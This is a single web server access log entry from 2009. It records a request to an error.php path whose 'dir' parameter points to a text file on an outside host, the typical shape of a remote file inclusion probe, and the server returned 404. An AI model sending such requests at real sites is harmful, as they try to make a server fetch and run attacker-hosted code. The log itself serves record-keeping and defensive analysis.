66.229.252.11 - - [09/Nov/2009:00:20:42 -0800] "GET /logs/access_090511.log/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
